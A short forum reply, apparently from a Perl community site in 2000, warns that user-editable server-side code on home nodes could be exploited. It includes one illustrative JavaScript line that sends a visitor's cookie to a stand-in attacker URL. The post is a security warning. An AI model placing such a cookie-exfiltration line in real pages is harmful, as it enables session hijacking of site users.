in reply to Home Node Code
Having looked at the Everything source code, I have to say that modifications aren't that easy for the uninitiated...
Having some server side code would allow for really nifty features, but I think this also is a really big security hole just waiting to be exploited. All it takes is some silly JavaScript to disclose your cookie (and such is easily done by using document.write( cookie ) or document.navigate( "http://black.hat.gov/catch&cookie" ), embedded as JavaScript in a link.
I guess you can always write a script with LWP to periodically update your home node :).
|
|---|
| Replies are listed 'Best First'. | |
|---|---|
|
RE: RE: Home Node Code
by Aighearach (Initiate) on Jun 15, 2000 at 13:04 UTC |